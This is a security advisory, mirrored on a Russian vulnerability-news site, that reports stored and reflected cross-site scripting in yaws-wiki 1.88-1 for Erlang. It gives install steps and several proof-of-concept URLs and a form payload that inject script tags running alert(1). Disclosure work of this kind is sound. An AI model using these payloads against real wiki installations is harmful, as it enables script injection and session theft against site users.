Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Xymon monitor cross-site scripting vulnerabilities

  HTB22914: Local File Inclusion in UseBB

  HTB22913: Multiple CSRF (Cross-Site Request Forgery) in UseBB

  HTB22912: Multiple SQL Injections in Eleanor CMS

From:mike_(at)_sitewat.ch <mike_(at)_sitewat.ch>
Date:5 апреля 2011 г.
Subject:Stored and Reflective XSS in Yaws-Wiki 1.88-1 (Erlang)

Software: yaws-wiki
version affected: 1.88-1
platform:  Erlang
homepage:http://yaws.hyber.org/
Researcher: Michael Brooks
Original Advisory:https://sitewat.ch/en/Advisory/4

Install instructions for Ubuntu:
sudo apt-get install yaws-wiki

Edit:/etc/yaws/conf.d/yaws-wiki.conf
#add this:
<server wiki>
port = 8181
listen = 0.0.0.0
docroot = /var/lib/yaws-wiki
</server>

Then restart yaws:
sudo /etc/init.d/yaws restart


Reflective XSS:
http://localhost:8181/editTag.
yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(
1)%3C/ScRiPt%3E
http://localhost:8181/showOldPage.
yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1
)%3C/ScRiPt%3E
http://localhost:8181/allRefsToMe.
yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/Sc
RiPt%3E

Stored XSS:
http://localhost:8181/editPage.yaws?node=home

The large textbox on the editPage.yaws page is vulnerable to xss.  This is the"text" post variable:
<script>alert(1)</script>

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород